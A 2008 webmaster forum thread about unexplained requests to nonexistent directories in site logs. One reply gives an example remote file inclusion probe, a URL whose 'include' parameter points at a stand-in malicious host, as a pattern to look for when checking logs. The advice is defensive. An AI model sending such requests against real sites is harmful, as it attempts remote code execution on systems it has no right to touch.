HomeDesigning Your WebsiteWebmaster's Corner

Random Findings in web logs

robfenn posted this at 11:19 — 14th August 2008.

robfenn's picture

He has: 471 posts

Joined: Jun 2005

Hi Guys,

Was looking at our Analytics and it shows that there has been loads of visits to directories that don't actually exist, such as variations of '/html/5.' Some are visited many times.. are these bots just trying to find vulnerabilities? Should i be worried?

Cheers,

Rob

pr0gr4mm3r posted this at 13:30 — 14th August 2008.

pr0gr4mm3r's picture

He has: 1,502 posts

Joined: Sep 2006

I will often find weird HTTP requests, but they usually include malicious query strings. Check your logs and see if it's something like:

http://yoursite.com/somescript.php?include=http://somemalicioussite/some...

If you find links like that in your log, it means that somebody is trying to find a remote script execution vulnerability. It's nothing to worry about as long as your code is secure and up to date.

demonhale posted this at 07:51 — 15th August 2008.

demonhale's picture

He has: 3,278 posts

Joined: May 2005

that's basically a good tip from programmer on checking your log files. But I thought at first that when you said web log, it was blog...

Also check for frame use on site...

Want to join the discussion? Create an account or log in if you already have one. Joining is fast, free and painless! We’ll even whisk you back here when you’ve finished.